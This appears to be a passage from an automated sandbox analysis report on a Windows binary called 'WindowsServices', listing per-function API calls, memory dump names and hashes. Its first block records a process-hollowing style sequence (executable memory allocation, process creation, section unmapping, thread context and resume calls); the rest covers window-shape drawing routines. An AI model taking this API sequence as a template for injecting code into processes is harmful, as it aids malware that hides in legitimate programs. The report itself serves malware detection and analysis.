• FindCloseChangeNotification.KERNELBASE(000000FF), ref: 004091BD
• VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000040), ref: 00409294
• CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004099EB
• Sleep.KERNELBASE(00000320), ref: 004099F6
• TerminateProcess.KERNELBASE(?,00000000), ref: 004099FF
Strings
Memory Dump Source
• Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
Similarity
• API ID: LibraryLoad$File$Create$Process$Thread$Memory$Write$VirtualWow64wcscat$Alloc$ChangeCloseFindNotificationResumeSectionSleepSuspendUnmapViewwcscpy$strstr$AddressContextDeleteFirstMoveProcProcess32ReadSnapshotTerminateToolhelp32$CopyModuleModule32NameNextwcslenwcsstr
• API String ID: 1831195861-1627083277
• Opcode ID: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
• Instruction ID: 2c80d00dd46d1456f42e515657256ab332893eb39df263fc7d206d4ca39ac36b
• Opcode Fuzzy Hash: 5d7796b2e5e3ecb3d87d144c009cb48b078826e94f245f0edb57868d79b5afd3
• Instruction Fuzzy Hash: 0993FE60D086E8D9EB22C768CC587DEBFB55F66304F0441D9D18C77282C6BA5B88CF66
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• SendMessageA.USER32(?,00000080,00000001,?), ref: 0040A2C8
• SendMessageA.USER32(?,00000080,00000000,?), ref: 0040A2D9
• GetWindowRect.USER32(?,?), ref: 0040A2F1
  • Part of subcall function 004052C0: CopyRect.USER32(?,004384C8), ref: 004052CD
• _ftol.MSVCRT ref: 0040A30F
• GetWindowRect.USER32(?,?), ref: 0040A34B
  • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 00405316
  • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040533E
  • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040535E
  • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040537E
  • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040539E
  • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053BE
  • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053DE
  • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 004053FE
  • Part of subcall function 00405300: CopyRect.USER32(?,004384C8), ref: 0040541E
• SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040A37F
Memory Dump Source
• Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
Similarity
• API ID: Rect$Copy$Window$MessageSend$_ftol
• String ID:
• API String ID: 1452107452-0
• Opcode ID: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
• Instruction ID: 82604ac88615afb37d6d3c3cd9f472b3106c4a6f90d73964fe7bd466d50d877b
• Opcode Fuzzy Hash: 77d943f6ea96e2ee8d93cdf0a1eb352025076fd503600f4a23e69f77a4334500
• Instruction Fuzzy Hash: 85315E71204705AFD314DF25C885F6BB7E8FBC8B04F004A2DB585A32C1D678E8098B9A
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• 69CE4ED0.MFC42(0040B243,0040B243,0040B243,0040B243,0040B243,00000000,?,0000000A), ref: 0040B2B2
Memory Dump Source
• Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
• Instruction ID: 357b4c9800bdd651ee11a6a5109b4e9d846802b8a319b0e0d2e175bba6204330
• Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
• Instruction Fuzzy Hash: 17B00836018386ABCB02DE91890592EBAA2BB99304F484C6DB2A5100A187668429BB56
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• IsIconic.USER32(?), ref: 0040A464
• SendMessageA.USER32(?,00000027,?,00000000), ref: 0040A49D
• GetSystemMetrics.USER32(0000000B), ref: 0040A4AB
• GetSystemMetrics.USER32(0000000C), ref: 0040A4B1
• GetClientRect.USER32(?,?), ref: 0040A4BE
• DrawIcon.USER32(?,?,?,?), ref: 0040A4F6
• CreateCompatibleDC.GDI32(?), ref: 0040A5A2
• LPtoDP.GDI32(?,?,00000002), ref: 0040A5BE
• CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040A5DF
• GetMapMode.GDI32(?,0040C6D4,00000000), ref: 0040A606
• DPtoLP.GDI32(?,?,00000002), ref: 0040A622
• GetWindowRect.USER32(?,?), ref: 0040A66B
Memory Dump Source
• Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
Similarity
• API ID: CompatibleCreateMetricsRectSystem$BitmapClientDrawIconIconicMessageModeSendWindow
• String ID:
• API String ID: 291364621-0
• Opcode ID: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
• Instruction ID: 6d70c99ac97023b5f14d40c01a2117d862bf0d83ff31a6fcaea798b65c65e005
• Opcode Fuzzy Hash: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
• Instruction Fuzzy Hash: 5FA1F971108341DFC314DF69C985E6BB7E9EBC8704F008A2EF596A3290D774E909CBA6
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CopyRect.USER32(?,004384C8), ref: 00404A56
• CopyRect.USER32(?,004384C8), ref: 00404A7E
  • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B21
  • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B4C
  • Part of subcall function 004039C0: Polygon.GDI32(?,?,?), ref: 00403B9A
• CopyRect.USER32(?,004384C8), ref: 00404A9E
• CopyRect.USER32(?,004384C8), ref: 00404ABE
• CopyRect.USER32(?,004384C8), ref: 00404ADE
• CopyRect.USER32(?,004384C8), ref: 00404AFE
• CopyRect.USER32(?,004384C8), ref: 00404B1E
• CopyRect.USER32(?,004384C8), ref: 00404B3E
• CopyRect.USER32(?,004384C8), ref: 00404B5E
• CopyRect.USER32(?,004384C8), ref: 00404B7E
• CopyRect.USER32(?,004384C8), ref: 00404B9E
• CopyRect.USER32(?,004384C8), ref: 00404BBE
• CopyRect.USER32(?,004384C8), ref: 00404BDE
• CopyRect.USER32(?,004384C8), ref: 00404BFE
• CopyRect.USER32(?,004384C8), ref: 00404C1E
• CopyRect.USER32(?,004384C8), ref: 00404C3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E9E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$_ftol$Polygon
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 2518728319-821843137
                                                                        • Opcode ID: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction ID: 1b864ce688a3351c981eaee8f36bd257d0a296356b300086fb8b46b6cfa255b8
                                                                        • Opcode Fuzzy Hash: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction Fuzzy Hash: FAB1B1FA9A03007ED200F6619C82D6BBB6CDAF8B15F40DD0EB559610C3B9BCD304867A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00405316
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                          • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403F95
                                                                          • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403FBF
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                          • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                          • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040541E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040543E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040545E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040547E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040549E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040551E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040553E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040555E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040557E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040559E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040561E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040563E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040565E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040567E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040569E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040571E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040573E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040575E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$CreatePolygon$Combine_ftol
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 3890769595-821843137
                                                                        • Opcode ID: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
                                                                        • Instruction ID: 87a306119b05220822c14238118f6d845cb676b63f2a489d8e55d3df45724c17
                                                                        • Opcode Fuzzy Hash: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
                                                                        • Instruction Fuzzy Hash: 09B1B2FA9803003ED200F661DC82D6BBB6CD9F8B11F40DE0EB559610C6B97CDB1486BA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ED6
                                                                          • Part of subcall function 00403C20: _ftol.MSVCRT ref: 00403D58
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404F10
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$_ftol
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon14$Polygon15$Polygon16$Polygon17$Polygon2$Polygon3$Polygon31$Polygon32$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 1144628616-677921438
                                                                        • Opcode ID: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
                                                                        • Instruction ID: 8a5b5832819b54604f0eb40b5f2cfffe4246f56c5ea39582f8810119041c68d6
                                                                        • Opcode Fuzzy Hash: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
                                                                        • Instruction Fuzzy Hash: EDA1C3BB6443103AE210B259AC42EAB676CDBE8724F408C3BF958D11C1F57DDA18C7B6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                        • String ID:
                                                                        • API String ID: 801014965-0
                                                                        • Opcode ID: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
                                                                        • Instruction ID: 92e6429448b312161c6c86a2e6f2100586677b1d17cdbc89596afef87365b123
                                                                        • Opcode Fuzzy Hash: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
                                                                        • Instruction Fuzzy Hash: 68416FB5800344EFDB209FA5D889AAE7BB8EB09714F20067FE551A72E1D7784841CB9C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • _ftol.MSVCRT ref: 0040450A
                                                                        • _ftol.MSVCRT ref: 00404538
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00404560
                                                                        • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404585
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040458F
                                                                        • CombineRgn.GDI32(?,?,?,00000002), ref: 004045C3
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 004045CB
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreatePolygon$Combine_ftol
                                                                        • String ID:
                                                                        • API String ID: 2242366081-0
                                                                        • Opcode ID: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
                                                                        • Instruction ID: 39bea9fad0b66382f5372ed494b3add627d4de448e91ddc4441a9f07906a4bc8
                                                                        • Opcode Fuzzy Hash: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
                                                                        • Instruction Fuzzy Hash: B09156B19083419FC310DF29C985A5BBBE4FFC4750F018A2EF999A7291DB34D814CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • _ftol.MSVCRT ref: 00403F95
                                                                        • _ftol.MSVCRT ref: 00403FBF
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                        • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                        • CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreatePolygon$Combine_ftol
                                                                        • String ID:
                                                                        • API String ID: 2242366081-0
                                                                        • Opcode ID: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
                                                                        • Instruction ID: d78316a0bae83b4357ed0e5d5a94130920efe7575c7a00bd962797de7769c8fd
                                                                        • Opcode Fuzzy Hash: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
                                                                        • Instruction Fuzzy Hash: 189179B1A083419FC310DF25C985A5BBBF4FF88714F118A2DF99AA7291DB34D914CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateCompatibleDC.GDI32(?), ref: 00409EBE
                                                                        • LPtoDP.GDI32(?,?,00000002), ref: 00409EDA
                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409EFB
                                                                        • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 00409F22
                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 00409F3E
                                                                        • GetWindowRect.USER32(?,?), ref: 00409F87
                                                                        • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 00409FFA
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CompatibleCreate$BitmapModeRectWindow
                                                                        • String ID:
                                                                        • API String ID: 1654611898-0
                                                                        • Opcode ID: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
                                                                        • Instruction ID: 387955213cf341242af21f02e85b7fd3331607f5cb7a19bffeb898acdc1f93f5
                                                                        • Opcode Fuzzy Hash: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
                                                                        • Instruction Fuzzy Hash: 997127711183409FC314DF64C88496FBBF8EBC9704F108A2EF6A693291DB79E905CB96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00401000: CopyRect.USER32(?,0040E020), ref: 0040100D
                                                                        • _ftol.MSVCRT ref: 00409CF7
                                                                        • _ftol.MSVCRT ref: 00409D0E
                                                                        • _ftol.MSVCRT ref: 00409D2B
                                                                        • GetWindowRect.USER32(?,?), ref: 00409D86
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 00402516
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040253E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040255E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040257E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040259E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025BE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025DE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025FE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040261E
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 00409DBF
                                                                        • SetCapture.USER32(?), ref: 00409DC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Copy$_ftol$Window$Capture
                                                                        • String ID:
                                                                        • API String ID: 1685161017-0
                                                                        • Opcode ID: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                        • Instruction ID: 353ad75620bb99855249955aa37f7dffc4285601670c8d5eecd51fb0f0ccdc6c
                                                                        • Opcode Fuzzy Hash: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                        • Instruction Fuzzy Hash: 1F416DB12187068FC304DF7AC98595BBBE8FBC8704F044A3EB49993381DB74E9098B56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

